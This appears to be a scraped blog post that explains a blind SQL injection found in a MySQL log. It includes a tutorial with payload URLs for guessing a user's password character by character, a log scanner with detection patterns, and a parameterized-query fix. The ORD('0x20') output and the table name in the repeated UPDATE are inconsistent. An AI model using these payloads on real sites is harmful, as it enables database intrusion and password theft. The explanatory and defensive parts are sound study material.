MySQL Advanced hack intrusion

Source: Internet
Author: User
Tags function prototype ord

A few days ago the database was broken into and the view counts of the articles were modified; fortunately it was discovered in time and there was a good backup. Checking the MySQL statement log, I found that this SQL statement was the one doing the mischief:

UPDATE table SET views='1' WHERE id=-2441 OR (ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1))>112)#

(The statement is shown in the form that the clause-by-clause analysis below takes apart; the LIMIT offset 1 is the one that selects the second row, Mio, whose second letter is the i that the analysis arrives at.)

PS: the user table is a table I had used earlier for testing in this database; its structure was also published in a blog post, which exposed the field names.

Why is this SQL so effective? Let's analyze it piece by piece.

1. First, the CAST(FirstName AS CHAR) clause. MySQL's CAST() function takes a value of one type and produces a value of another type; see "MySQL CAST and CONVERT function usage" for details. Let's look at what it returns:

mysql> SELECT CAST(FirstName AS CHAR) FROM user;
+-------------------------+
| CAST(FirstName AS CHAR) |
+-------------------------+
| Gonn                    |
| Mio                     |
| Google                  |
| Yale                    |
+-------------------------+
4 rows in set

It simply converts every FirstName value to the CHAR type.

2. Next, look at the effect of the clause IFNULL(CAST(FirstName AS CHAR), 0x20). Usage: IFNULL(expr1, expr2) returns expr1 if expr1 is not NULL, otherwise it returns expr2. See "MySQL IFNULL() function usage" for details.

Execute:

mysql> SELECT IFNULL(CAST(FirstName AS CHAR), 0x20) FROM user;
+---------------------------------------+
| IFNULL(CAST(FirstName AS CHAR), 0x20) |
+---------------------------------------+
| Gonn                                  |
| Mio                                   |
| Google                                |
| Yale                                  |
+---------------------------------------+
4 rows in set

Although the results look no different, the clause does play a role: if the CAST to CHAR yields NULL, IFNULL returns 0x20 (a space) instead, so that the ORD() applied later always has a character to work on.

3. Next, look at the clause MID((SELECT IFNULL(CAST(FirstName AS CHAR), 0x20) FROM user ORDER BY id LIMIT 1,1), 2, 1) (the offset 1 picks the second row, Mio). The MID() function extracts a substring; see "MySQL MID() function usage" for details.

mysql> SELECT MID((SELECT IFNULL(CAST(FirstName AS CHAR), 0x20) FROM user ORDER BY id LIMIT 1,1), 2, 1);
+-------------------------------------------------------------------------------------------+
| MID((SELECT IFNULL(CAST(FirstName AS CHAR), 0x20) FROM user ORDER BY id LIMIT 1,1), 2, 1) |
+-------------------------------------------------------------------------------------------+
| i                                                                                         |
+-------------------------------------------------------------------------------------------+
1 row in set

We get the single letter i.

4. Now the key clause: ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR), 0x20) FROM user ORDER BY id LIMIT 1,1), 2, 1)). The ORD() function returns the ASCII value of the first character of a string; see "MySQL ORD() function usage".

mysql> SELECT ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR), 0x20) FROM user ORDER BY id LIMIT 1,1), 2, 1));
+------------------------------------------------------------------------------------------------+
| ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR), 0x20) FROM user ORDER BY id LIMIT 1,1), 2, 1)) |
+------------------------------------------------------------------------------------------------+
|                                                                                            105 |
+------------------------------------------------------------------------------------------------+
1 row in set

The ASCII code of i is 105.

If the CAST fails and 0x20 is returned instead, this is the situation:

mysql> SELECT ORD('0x20');
+-------------+
| ORD('0x20') |
+-------------+
|             |
+-------------+
1 row in set

In both cases the result is an ASCII value that can be compared against 112, and whenever it is greater than 112 the following hack statement is executed:

UPDATE table SET views='1' WHERE id=-2441 OR (ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM nowamagic.`TB2` ORDER BY id LIMIT 1,1),2,1))>112)#

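The attack above was only caught by reading the MySQL statement log, and that log is also where it can be detected automatically. The following Python scanner is an added example, not code from the original post: it parses lines in the layout of the MySQL general query log (the sample lines are constructed, with the third one modelled on the injected UPDATE analysed above) and reports statements that carry the hallmarks of character-by-character probing: ORD() or ASCII() wrapped around MID() or SUBSTRING(), LENGTH() compared with a constant, an impossible negative id followed by OR, a scalar subquery selecting one row with LIMIT offset,1, and a trailing # comment. The indicator names, the two-indicator threshold and the log layout are assumptions made for the example.

```python
import re

# Constructed sample lines in the layout of the MySQL general query log
# (timestamp, thread id, command, argument). Not taken from the original post;
# the third line mirrors the injected UPDATE analysed above.
SAMPLE_LOG = """\
2023-01-01T10:00:00.000001Z    12 Query    SELECT id, title FROM article WHERE id = 2441
2023-01-01T10:00:01.000002Z    12 Query    UPDATE article SET views = views + 1 WHERE id = 2441
2023-01-01T10:00:02.000003Z    13 Query    UPDATE article SET views = '1' WHERE id = -2441 OR (ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1))>112)#
2023-01-01T10:00:03.000004Z    13 Query    SELECT * FROM article WHERE id = 10 AND LENGTH(password)=12#
2023-01-01T10:00:04.000005Z    13 Query    SELECT * FROM article WHERE id = 10 AND ORD(MID(password,1,1))>0x41#
"""

# One log line: timestamp, thread id, command word, then the statement text.
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Indicators of boolean-blind probing (assumed names, chosen for this example).
INDICATORS = {
    # ORD()/ASCII() wrapped around MID()/SUBSTRING(): reading one character as a number
    "char_extraction": re.compile(r"\b(?:ORD|ASCII)\s*\(\s*(?:MID|SUBSTR(?:ING)?)\s*\(", re.I),
    # MID(...) = CHAR(..) or MID(...) BETWEEN CHAR(..): comparing one character
    "char_compare": re.compile(r"\b(?:MID|SUBSTR(?:ING)?)\s*\([^()]*\)\s*(?:=|BETWEEN)\s*CHAR\s*\(", re.I),
    # LENGTH(col) compared with a constant: guessing a field's length
    "length_probe": re.compile(r"\bLENGTH\s*\(\s*\w+\s*\)\s*[=<>]", re.I),
    # an impossible negative id followed by OR: rows are selected only by the probe
    "negative_id_or": re.compile(r"=\s*-\d+\s+OR\b", re.I),
    # scalar subquery picking exactly one row with LIMIT offset,count
    "scalar_subquery_limit": re.compile(r"\(\s*SELECT\b.*?\bLIMIT\s+\d+\s*,\s*\d+\s*\)", re.I),
    # statement ends in a comment that cuts off the application's own SQL
    "trailing_comment": re.compile(r"(?:#|--)\s*$"),
}


def analyse_statement(sql):
    """Return the names of all indicators that match one SQL statement."""
    return [name for name, rx in INDICATORS.items() if rx.search(sql)]


def scan_general_log(text, min_indicators=2):
    """Parse general-log text and return the Query lines that look like blind probing.

    A line is reported only when at least min_indicators indicators match, so
    ordinary statements that merely use LENGTH() or MID() stay out of the report.
    """
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        hits = analyse_statement(m.group("arg"))
        if len(hits) >= min_indicators:
            findings.append({
                "timestamp": m.group("ts"),
                "thread": int(m.group("thread")),
                "indicators": hits,
                "sql": m.group("arg"),
            })
    return findings


def probes_per_thread(findings):
    """Count flagged statements per connection: a probing client sends many in a row."""
    counts = {}
    for f in findings:
        counts[f["thread"]] = counts.get(f["thread"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_general_log(SAMPLE_LOG)
    for f in found:
        print(f["timestamp"], "thread", f["thread"], ",".join(f["indicators"]))
        print("    ", f["sql"])
    print(probes_per_thread(found))
```

Run against a real general log the same way, feeding the file contents to scan_general_log; the per-thread count is the more useful signal, because a single guessed character already takes a run of statements from one connection.
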
MySQL Guess injection

MySQL has many built-in functions that can be used to do unexpected things, even in older versions of MySQL that have no UNION query support. Suppose the site is http://www.nm.net/ and we want to know the password of the user whose ID is 10. First make the following request:

http://www.nm.net/index.php?id=10 and length(password)=12#

By passing the length() function and checking whether the page returns normally, we can determine the length of the user's password; here we guess 12 characters. Note the # after the number. Next, use mid() and char() to brute-force each character of the password; if the guess is right, the page returns normally:

http://www.nm.net/index.php?id=10 and mid(password,1,1)=char(0x60)#

The prototype of mid() is MID(str,pos,len); the substring() function can be used instead. The argument of char() is an ASCII value in the range 0~255, which can be traversed one value at a time.

In addition, BETWEEN can be used to determine whether a character is a digit or a letter, narrowing the range and speeding up the brute force. For example, to test whether a character is a lowercase letter, make the following request:

http://www.nm.net/index.php?id=10 and (mid(password,1,1)) between char(0x61) and char(0x7A)#

Besides char(), the ORD function can also be used for guessing. ORD returns the ASCII value of a character, so it serves the same purpose:

http://www.nm.net/index.php?id=10 and ord(mid(password,1,1))=0x6d#

Another benefit of ORD is that the greater-than and less-than operators can be used to narrow down the range of a character:

http://www.nm.net/index.php?id=10 and ord(mid(password,1,1))>0x41#

And so, step by step, the injection is guessed out by hand.
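The guessing procedure above works only because the page behaves as a yes/no oracle: whatever follows the number in ?id= is spliced into the WHERE clause, and the response differs depending on whether the spliced condition is true. The following Python example is added here and is not code from the original post. It uses an in-memory sqlite3 table as a stand-in for the site's MySQL database (the table, its rows and the function names are constructed for the example) to put the vulnerable string concatenation next to the hardened lookup, running the post's length probe against both: the concatenated version answers the probe, the parameterized version does not.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's user table (sqlite3 instead of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(9, "alice", "s3cret"), (10, "bob", "twelve-chars")],  # 'twelve-chars' is 12 characters long
    )
    conn.commit()
    return conn


def lookup_unsafe(conn, id_param):
    """Vulnerable pattern: the raw value of ?id= is pasted into the SQL text.

    Whatever follows the number becomes part of the WHERE clause, so a true
    condition returns the row (the 'normal page') and a false one returns nothing.
    """
    sql = "SELECT id, name FROM user WHERE id = " + id_param
    return conn.execute(sql).fetchone()


def lookup_safe(conn, id_param):
    """Hardened pattern: validate the type, then bind the value as a parameter.

    The driver sends the value separately from the statement text, so it can
    never extend the WHERE clause; the int() check rejects junk before any query.
    """
    try:
        user_id = int(id_param)
    except (TypeError, ValueError):
        return None
    return conn.execute("SELECT id, name FROM user WHERE id = ?", (user_id,)).fetchone()


def compare():
    """Run the post's length probe (without the MySQL-only '#' terminator) against both lookups."""
    conn = make_db()
    true_probe = "10 and length(password)=12"
    false_probe = "10 and length(password)=13"
    return {
        "unsafe_true_probe": lookup_unsafe(conn, true_probe),    # row comes back: the oracle says yes
        "unsafe_false_probe": lookup_unsafe(conn, false_probe),  # no row: the oracle says no
        "safe_probe": lookup_safe(conn, true_probe),             # rejected before any SQL runs
        "safe_plain": lookup_safe(conn, "10"),                   # an ordinary request still works
    }


if __name__ == "__main__":
    for name, result in compare().items():
        print(f"{name:20s} -> {result}")
```

The int() validation is a belt-and-braces check; the parameter binding alone already stops the spliced condition, because the driver never lets a bound value change the statement's structure. The same two-step shape (validate, then bind) applies unchanged to MySQL drivers that accept %s or ? placeholders.
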
